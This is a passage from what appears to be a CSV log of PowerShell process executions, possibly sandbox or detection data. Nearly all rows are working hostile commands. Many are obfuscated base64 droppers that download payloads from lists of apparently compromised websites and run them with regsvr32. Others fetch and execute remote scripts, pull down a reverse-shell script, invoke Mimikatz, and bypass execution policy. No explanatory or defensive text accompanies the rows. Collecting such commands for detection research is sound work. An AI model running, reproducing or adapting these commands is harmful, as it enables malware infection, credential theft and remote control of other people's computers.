';$sW=$poAqp+$MYYKc;$URKR=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($sW));$sW=$URKR;iex($sW)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'r+uUhQcIRnF2F84KIXYrVyWTdMz7jVVPLAOUaLX/6YeWJcshQM9FOVHySXACo+Ci1b+FaVnT';$MjIdco='ICAgV3JpdGUtSG9zdCAiVlNFU1oiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHBzOi8vd3d3LnllbGwuZ2UvbmF2X2xvZ28vQUVuVFAvIiwiaHR0cDovL3l1c3V';$mncv='ma2FycGFrLmNvbS50ci9jc3MvN3lDSjZLcEdOZE93blcvIiwiaHR0cHM6Ly95YWtvc3VyZi5jb20vd3AtaW5jbHVkZXMvUy8iLCJodHRwczovL3lveW1hbmFqZW1lbi5pZC93cC1hZG1pbi94OUVqdTAvIiwiaHR0cHM6Ly95ZWRpcmVua2FqYW5zLmNvbS9lc2tpL0V2ZW9GcWs4SGx1dlMvIiwiaHR0cDovL3l1ZGFpc3V6dWtpLmpwLzE1MDkxMXByZS9pSS8iKTskdD0idWpYZ0FEIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXHJSWHF3R3ZHTlIud1RqO1JlZ3N2cjMyLmV4ZSAiJGRcclJYcXdHdkdOUi53VGoiO2JyZWFrfSBjYXRjaCB7IH19';$oTNOK=$MjIdco+$mncv;$cdOyg=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($oTNOK));$oTNOK=$cdOyg;iex($oTNOK)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'r5vZSmba4j5qFHssFFGu8/6o4l8c5FyI9b5XInzKWcYuCYgybQqTz/KN597TakQkTAHe6WVP';$poAqp='ICAgICAgICBXcml0ZS1Ib3N0ICJBbUpEWiI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW';$MYYKc='50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3Rvd29ya3MuY2EvcGhwbXlhZG1pbi9YLyIsImh0dHBzOi8vdmlldHJvbGwudm4vd3AtY29udGVudC9UUWRrUC8iLCJodHRwOi8vd2lldHNlZGV2cmllcy5ubC93ZWJzdGF0cy9TZUNQeWlRYmdtWllCTG93c29LZS8iLCJodHRwOi8vYnJlbm5hbmFzaWEuY29tL2ltYWdlcy9jUDhDTUJZNXF4MXUvIiwiaHR0cDovL2JhbmNoYW5uLmNvbS9wcm9kdWN0LzR5S2NMZWZsWVBCU3YxMS8iLCJodHRwczovL3RpbmVyaWlidWN1cmVzdGVuaS5yby93cC1pbmNsdWRlcy9ZQnlndy8iKTskdD0iUXlmWmd0clZ1IjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXFJsYWR1T0pETlYuSE5BO1JlZ3N2cjMyLmV4ZSAiJGRcUmxhZHVPSkROVi5ITkEiO2JyZWFrfSBjYXRjaCB7IH19';$sW=$poAqp+$MYYKc;$URKR=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($sW));$sW=$URKR;iex($sW)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'rtmOXT+Fr5YAK/EheYdq4wuBNe17qD8qgxP/EpYuzR7YhUQrgk6UU5BdCSNl7fl85f2SsRi7';$HRfF='ICAgICBXcml0ZS1Ib3N0ICJXTHJWUCI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cHM6Ly93d3cuaW5ncm91cGNvbnN1bHQuY29tL2ltYWdlcy9QRXgvIiwiaHR0cDovL3d1bGYubmwvY2dpLWJpbi9';$RFnG='0LyIsImh0dHA6Ly93cC5lcnlhei5uZXQvYmF5YXIxLzlaQUFPLyIsImh0dHA6Ly93d3cuY2lzbmMuaXQvd3AtY29udGVudC9TZ0NicklSeVV3YjlrakVLZTNKLyIsImh0dHA6Ly9hbGRvanVhbnBldHRpdGkuY29tLmFyL2FsbWFodS5jb20uYXIvQURPWXMvIiwiaHR0cDovL3poaXZpci5jb20vd3AvVS8iKTskdD0iVFFRd25jVGRLIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEVKanVUcHdpWUEuUEhCO1JlZ3N2cjMyLmV4ZSAiJGRcRUpqdVRwd2lZQS5QSEIiO2JyZWFrfSBjYXRjaCB7IH19';$ryVIql=$HRfF+$RFnG;$zDDWaH=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($ryVIql));$ryVIql=$zDDWaH;iex($ryVIql)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'sIQoTxapUl3eePB5cy56H5Hce9QgjxDMlVQsWs3RwzmvtZa/5PBPev0MuDED5R+Z8wzyMKt1';$HRfF='ICAgICBXcml0ZS1Ib3N0ICJXTHJWUCI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cHM6Ly93d3cuaW5ncm91cGNvbnN1bHQuY29tL2ltYWdlcy9QRXgvIiwiaHR0cDovL3d1bGYubmwvY2dpLWJpbi9';$RFnG='0LyIsImh0dHA6Ly93cC5lcnlhei5uZXQvYmF5YXIxLzlaQUFPLyIsImh0dHA6Ly93d3cuY2lzbmMuaXQvd3AtY29udGVudC9TZ0NicklSeVV3YjlrakVLZTNKLyIsImh0dHA6Ly9hbGRvanVhbnBldHRpdGkuY29tLmFyL2FsbWFodS5jb20uYXIvQURPWXMvIiwiaHR0cDovL3poaXZpci5jb20vd3AvVS8iKTskdD0iVFFRd25jVGRLIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEVKanVUcHdpWUEuUEhCO1JlZ3N2cjMyLmV4ZSAiJGRcRUpqdVRwd2lZQS5QSEIiO2JyZWFrfSBjYXRjaCB7IH19';$ryVIql=$HRfF+$RFnG;$zDDWaH=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($ryVIql));$ryVIql=$zDDWaH;iex($ryVIql)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'sRAl5ZE6LjciiTry/NDaC/MvHtTLkmdnekqcn1G5l2/oDTQGqfOvF7NniN9UAzb9xgh0Mq0y';$jf='ICAgV3JpdGUtSG9zdCAiT1JqeXEiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oIm';$YFtXtU='h0dHA6Ly93d3cubmFrbGFmc2h0YWJ1ay5jb20vd3AtY29udGVudC9zRVhFWjlFYm1NNlRPRS8iLCJodHRwOi8vam9iY2l0eS5jb20vaW1nL1JNMFhwWC8iLCJodHRwczovL2JvbGVvLm5sL2Nvbm5lY3RvcnMvNjZQR09ERTFIaGF5NGUvIiwiaHR0cDovL3dpbmRzdXJmaW5ndGhhaWxhbmQub3JnL2FkbWluLzNoanltUlBlNGNSNGgvIiwiaHR0cDovL3d3dy52YWx5dmFsLmNvbS9wdW4vaFQvIiwiaHR0cDovL3dpdGh2YWMwMDEuZG90aG9tZS5jby5rci9hc3NldDMvc0xuRms4aUZVd1BBaTFtQWZRLyIpOyR0PSJaUHZaUG9EIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXGtCYk52emhKSXMud0pwO1JlZ3N2cjMyLmV4ZSAiJGRca0JiTnZ6aEpJcy53SnAiO2JyZWFrfSBjYXRjaCB7IH19';$rNJrM=$jf+$YFtXtU;$bIcdbg=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($rNJrM));$rNJrM=$bIcdbg;iex($rNJrM)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'sgHFvI17Gw5u6M9FMdxP6Z8SRyp6r3hU4vXFdHM7cPS0rxh5ClNV4+tGQyjzFlKLPg0yyC3t';$HRfF='ICAgICBXcml0ZS1Ib3N0ICJXTHJWUCI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cHM6Ly93d3cuaW5ncm91cGNvbnN1bHQuY29tL2ltYWdlcy9QRXgvIiwiaHR0cDovL3d1bGYubmwvY2dpLWJpbi9';$RFnG='0LyIsImh0dHA6Ly93cC5lcnlhei5uZXQvYmF5YXIxLzlaQUFPLyIsImh0dHA6Ly93d3cuY2lzbmMuaXQvd3AtY29udGVudC9TZ0NicklSeVV3YjlrakVLZTNKLyIsImh0dHA6Ly9hbGRvanVhbnBldHRpdGkuY29tLmFyL2FsbWFodS5jb20uYXIvQURPWXMvIiwiaHR0cDovL3poaXZpci5jb20vd3AvVS8iKTskdD0iVFFRd25jVGRLIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEVKanVUcHdpWUEuUEhCO1JlZ3N2cjMyLmV4ZSAiJGRcRUpqdVRwd2lZQS5QSEIiO2JyZWFrfSBjYXRjaCB7IH19';$ryVIql=$HRfF+$RFnG;$zDDWaH=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($ryVIql));$ryVIql=$zDDWaH;iex($ryVIql)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'v9FYMl5hQOPHpCnSTSs+ShyOaNY0EeKPKEfmATquifyZe6dP2LHWriwDdENYzzhZVhNsaPOA';$jf='ICAgV3JpdGUtSG9zdCAiT1JqeXEiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oIm';$YFtXtU='h0dHA6Ly93d3cubmFrbGFmc2h0YWJ1ay5jb20vd3AtY29udGVudC9zRVhFWjlFYm1NNlRPRS8iLCJodHRwOi8vam9iY2l0eS5jb20vaW1nL1JNMFhwWC8iLCJodHRwczovL2JvbGVvLm5sL2Nvbm5lY3RvcnMvNjZQR09ERTFIaGF5NGUvIiwiaHR0cDovL3dpbmRzdXJmaW5ndGhhaWxhbmQub3JnL2FkbWluLzNoanltUlBlNGNSNGgvIiwiaHR0cDovL3d3dy52YWx5dmFsLmNvbS9wdW4vaFQvIiwiaHR0cDovL3dpdGh2YWMwMDEuZG90aG9tZS5jby5rci9hc3NldDMvc0xuRms4aUZVd1BBaTFtQWZRLyIpOyR0PSJaUHZaUG9EIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXGtCYk52emhKSXMud0pwO1JlZ3N2cjMyLmV4ZSAiJGRca0JiTnZ6aEpJcy53SnAiO2JyZWFrfSBjYXRjaCB7IH19';$rNJrM=$jf+$YFtXtU;$bIcdbg=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($rNJrM));$rNJrM=$bIcdbg;iex($rNJrM)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'wT+DcwpdzMR5w42PvY8Y47LhpXFTAYegLV27gDFvT5pRyj4/50Nvf7lxIIr/yBsJ1QtyU6gG';$Hkc='JlbmNlPSJTaWxlbnRseUNvbnRpbnVlIjskbGlua3M9KCJodHRwOi8vbmljb2xhc3Nwb3J0YWZvbGlvLmF0d2VicGFnZXMuY29tL2Nzcy94S0FLYXpDVE4vIiwiaHR0cDovL3d3dy5haGFuLm9yZy5way9jYXRhbG9ndWVzL3YzLyIsImh0dHA6Ly9ucmMtc29sdWNpb25lcy5jb20uYXIvY2dpLWJpbi9uOWIwQTlOM0pScks2TXkvIiwiaHR0cDovL3d3dy5hZ3JldHRvLmNvbS9UZW1wbGF0ZS9qRURZQ1ltOG50SnQwU3EvIiwiaHR0cHM6Ly9teWFubWFyY2hlZnMuY29tL3dwLWNvbnRlbnQvS3VHNFc3aC8iLCJodHRwOi8vd29vbGxvb21vb2xvby5ubC9jZ2ktYmluL3pJZHdOQzJkLyIpOyR0PSJlblBNTXZSbiI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxLS0h3RUx3Y29YLnJLVTtSZWdzdnIzMi5leGUgIiRkXEtLSHdFTHdjb1gucktVIjticmVha30gY2F0Y2ggeyB9fQ==';$ZYCJ='IFdyaXRlLUhvc3QgInNBYlZTIjskUHJvZ3Jlc3NQcmVmZX';$ZYCJ=$ZYCJ+$Hkc;$EL=$ZYCJ;$gFtY=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($EL));$EL=$gFtY;iex($EL)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'xj5OZbm/jyz3jOl8A5mPtMD+Hr71sFu9l1F016I/P3WLu6xqnCmwKp0rsGMj/TCutkyoTlAf';$HRfF='ICAgICBXcml0ZS1Ib3N0ICJXTHJWUCI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cHM6Ly93d3cuaW5ncm91cGNvbnN1bHQuY29tL2ltYWdlcy9QRXgvIiwiaHR0cDovL3d1bGYubmwvY2dpLWJpbi9';$RFnG='0LyIsImh0dHA6Ly93cC5lcnlhei5uZXQvYmF5YXIxLzlaQUFPLyIsImh0dHA6Ly93d3cuY2lzbmMuaXQvd3AtY29udGVudC9TZ0NicklSeVV3YjlrakVLZTNKLyIsImh0dHA6Ly9hbGRvanVhbnBldHRpdGkuY29tLmFyL2FsbWFodS5jb20uYXIvQURPWXMvIiwiaHR0cDovL3poaXZpci5jb20vd3AvVS8iKTskdD0iVFFRd25jVGRLIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEVKanVUcHdpWUEuUEhCO1JlZ3N2cjMyLmV4ZSAiJGRcRUpqdVRwd2lZQS5QSEIiO2JyZWFrfSBjYXRjaCB7IH19';$ryVIql=$HRfF+$RFnG;$zDDWaH=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($ryVIql));$ryVIql=$zDDWaH;iex($ryVIql)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'xuY68BROfqcyz6vj2D5bpMNu4b2ILn9NjAKdnqJYrH+uecVd/Ns7wWozkRQNXVcch0dh8OzH';$HRfF='ICAgICBXcml0ZS1Ib3N0ICJXTHJWUCI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cHM6Ly93d3cuaW5ncm91cGNvbnN1bHQuY29tL2ltYWdlcy9QRXgvIiwiaHR0cDovL3d1bGYubmwvY2dpLWJpbi9';$RFnG='0LyIsImh0dHA6Ly93cC5lcnlhei5uZXQvYmF5YXIxLzlaQUFPLyIsImh0dHA6Ly93d3cuY2lzbmMuaXQvd3AtY29udGVudC9TZ0NicklSeVV3YjlrakVLZTNKLyIsImh0dHA6Ly9hbGRvanVhbnBldHRpdGkuY29tLmFyL2FsbWFodS5jb20uYXIvQURPWXMvIiwiaHR0cDovL3poaXZpci5jb20vd3AvVS8iKTskdD0iVFFRd25jVGRLIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEVKanVUcHdpWUEuUEhCO1JlZ3N2cjMyLmV4ZSAiJGRcRUpqdVRwd2lZQS5QSEIiO2JyZWFrfSBjYXRjaCB7IH19';$ryVIql=$HRfF+$RFnG;$zDDWaH=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($ryVIql));$ryVIql=$zDDWaH;iex($ryVIql)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'ybCMsDqJtDk16iMKr0BJ27zEgO1UjQdq3IDsExKicbn90ui4ADkRg+hE07CVn0+VQgVky3kO';$jf='ICAgV3JpdGUtSG9zdCAiT1JqeXEiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oIm';$YFtXtU='h0dHA6Ly93d3cubmFrbGFmc2h0YWJ1ay5jb20vd3AtY29udGVudC9zRVhFWjlFYm1NNlRPRS8iLCJodHRwOi8vam9iY2l0eS5jb20vaW1nL1JNMFhwWC8iLCJodHRwczovL2JvbGVvLm5sL2Nvbm5lY3RvcnMvNjZQR09ERTFIaGF5NGUvIiwiaHR0cDovL3dpbmRzdXJmaW5ndGhhaWxhbmQub3JnL2FkbWluLzNoanltUlBlNGNSNGgvIiwiaHR0cDovL3d3dy52YWx5dmFsLmNvbS9wdW4vaFQvIiwiaHR0cDovL3dpdGh2YWMwMDEuZG90aG9tZS5jby5rci9hc3NldDMvc0xuRms4aUZVd1BBaTFtQWZRLyIpOyR0PSJaUHZaUG9EIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXGtCYk52emhKSXMud0pwO1JlZ3N2cjMyLmV4ZSAiJGRca0JiTnZ6aEpJcy53SnAiO2JyZWFrfSBjYXRjaCB7IH19';$rNJrM=$jf+$YFtXtU;$bIcdbg=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($rNJrM));$rNJrM=$bIcdbg;iex($rNJrM)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'z0Kn9NStByRFDLRdDJfW2FciG4+Az3T5DxaOR+/y4MBa6WRSbiUWi97EPU5kcMC3p84l4vcF';$HRfF='ICAgICBXcml0ZS1Ib3N0ICJXTHJWUCI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cHM6Ly93d3cuaW5ncm91cGNvbnN1bHQuY29tL2ltYWdlcy9QRXgvIiwiaHR0cDovL3d1bGYubmwvY2dpLWJpbi9';$RFnG='0LyIsImh0dHA6Ly93cC5lcnlhei5uZXQvYmF5YXIxLzlaQUFPLyIsImh0dHA6Ly93d3cuY2lzbmMuaXQvd3AtY29udGVudC9TZ0NicklSeVV3YjlrakVLZTNKLyIsImh0dHA6Ly9hbGRvanVhbnBldHRpdGkuY29tLmFyL2FsbWFodS5jb20uYXIvQURPWXMvIiwiaHR0cDovL3poaXZpci5jb20vd3AvVS8iKTskdD0iVFFRd25jVGRLIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEVKanVUcHdpWUEuUEhCO1JlZ3N2cjMyLmV4ZSAiJGRcRUpqdVRwd2lZQS5QSEIiO2JyZWFrfSBjYXRjaCB7IH19';$ryVIql=$HRfF+$RFnG;$zDDWaH=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($ryVIql));$ryVIql=$zDDWaH;iex($ryVIql)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""iex(New-Object Net.WebClient).DownloadString('https://pst.klgrth.io/paste/pe6yx/raw')""","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""invoke-mimikatz""","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""invoke-webrequest -uri https://raw.githubusercontent.com/martinsohn/PowerShell-reverse-shell/main/powershell-reverse-shell.ps1 -outfile 'C:\r\reverse.ps1'; iex $(cat 'C:\r\reverse.ps1')""","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -command ""-EncodedCommand PAAjAEYAUwBMAGoAcwBBAEsAIwA+AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgADwAIwBiAFcAdAB1AG4AUQAjAD4AIAAtAFMAZQBjAG8AbgBkAHMAIAA8ACMAVQBmAHAAYwBpACMAPgAgADUAOwA8ACMARQBCAHYAIwA+ACAAQQBkAG""","C:\WINDOWS\System32\WindowsPowerShell\v1.0\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -command -executionpolicy bypass ""(New-Object System.Net.WebClient).DownloadFile('http://192.168.106.15:8000/calc.exe', 'C:\Windows\Temp\cl.exe');C:\Windows\Temp\cl.exe""","C:\Users\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -command “Invoke-WebRequest -Uri https://digital-alpha-world.de/DAW_Res.zip -OutFile C:\temp\dl.zip”","C:\Windows\System32\WindowsPowerShell\v1.0\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -enc JABwAGEAdABoAD0AKAAkAHAAdwBkACkALgBwAGEAdABoADsAcwB0AGEAcgB0ACAAJABwAGEAdABoACcAXAB0AGUAcwB0AC4AagBwAGcAJwA7AHMAdABhAHIAdAAgACQAcABhAHQAaAAnAFwAdABlAHMAdAAuAGoAcABnACcA","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -enc KAAkAHAAdwBkACkALgBwAGEAdABoACsAIgBcAHMAYwByAGkAcAB0AC4AcABzADEAIgA=","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -enc LQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAALQBuAG8ATABvAGcAbwAgAC0AQwBvAG0AbQBhAG4AZAAgACAAbgBvAHQAZQBwAGEAZAAuAGUAeABlADsAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBO","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -enc LQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAALQBuAG8ATABvAGcAbwAgAC0AQwBvAG0AbQBhAG4AZAAgACAAbgBvAHQAZQBwAGEAZAAuAGUAeABlADsAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAO","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAtADEAMQA3AC4AYQBuAG8AbgBmAGkAbABlAHMALgBjAG8AbQAvAEUANQBHAGUAUQBhADAAZAB5ADcALwA4ADMAMwA2ADIAMwBjAGEALQAxADYANQA4ADkAMgAzADMANwAwAC8AcwBjAHIAaQBwAHQALgBwAHMAMQAnACkA","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AYQByAHQAYQBtAG8AbgB5AC8AdABlAHMAdAAvAG0AYQBpAG4ALwBwAGEAeQBsAG8AYQBkAC4AcABzADEAJwApAA==","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -enc aQBlAHgAIAAoAGkAdwByACAAJwBoAHQAdABwADoALwAvAHQAZQBzAHQAdQBqAGUAbQB5AC4AcwBlAGMAdQByAGkAdAB5AG0AZQBlAHQAdQBwAC4AcABsADoAOAAwADgAMAAvAGcAdQBlAHMAdAAvAGgAZQBsAGwAbwAvAHAAcwAxACcAKQA=","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -encoded ""JABjACAAPQAgAEAAIgANAAoAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABsAA0ACgB7AA0ACgAgACAAIAAgAHAAdQBiAGwAaQBjACAAdgBvAGkAZAAgAHIAKABzAHQAcgBpAG4AZwAgAHAAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAUwB5AHMAdABlAG0ALgBDAG8AbgBzAG8AbABlAC4AVwByAGkAdABlAEwAaQBuAGUAKABwACkAOwANAAoAIAAgACAAIAAgACAAIAAgAFMAeQBzAHQAZQBtAC4AQwBvAG4AcwBvAGwAZQAuAFIAZQBhAGQATABpAG4AZQAoACkAOwANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAiAEAADQAKAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgACQAYwANAAoAJABjAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAbAANAAoAJABjAGkALgByACgAIgBoAGUAbABsAG8AIAB3AG8AcgBsAGQAIgApAA==""","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -ep b\y\p\a\s\s -NoP -NonI -W 1 -enc QwBvAG4AdABlAG4AdAAgAGEAYwBjAG8AdQBuAHQALgBwAGQAZgAuAGwAbgBrACAALQBTAHQAcgBlAGEAbQAgAHMALgBwAHMAMQAgAHwAIABpAGUAeAA=","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -ep bypass -file quotefile.ps1","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -exec bypass -w h -file PiwwMNnYcVXyffwre.ps1","C:\Users\user\Desktop\",1
